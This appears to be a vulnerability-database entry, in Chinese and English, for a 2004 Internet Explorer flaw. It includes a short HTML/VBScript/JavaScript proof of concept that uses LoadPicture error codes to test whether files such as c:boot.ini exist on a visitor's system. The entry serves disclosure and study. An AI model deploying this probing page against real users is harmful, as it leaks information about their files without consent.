https://www.exploit-db.com/exploits/23668
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-032

MicrosoftInternetExplorer是一款流行的WEB浏览器。MicrosoftInternetExplorer没有正确处理部分VBScript方法，远程攻击者可以利用这个漏洞构建恶意WEB页，诱使用户访问，可列举客户端存在的文件。这个漏洞可通过VBScriptLoadPicture方法来触发，利用这个方法可列举目标系统上的文件是否存在，造成部分敏感信息泄露。攻击者可以构建恶意WEB页，或发送HTML形式邮件来触发。

source: http://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. 

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>

来源:XF
名称:ie-error-obtain-information(15078)
链接:http://xforce.iss.net/xforce/xfdb/15078
来源:BID
名称:9611
链接:http://www.securityfocus.com/bid/9611
来源:SECUNIA
名称:10820
链接:http://secunia.com/advisories/10820
来源:FULLDISC
名称:20040207(nosubject)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016881.html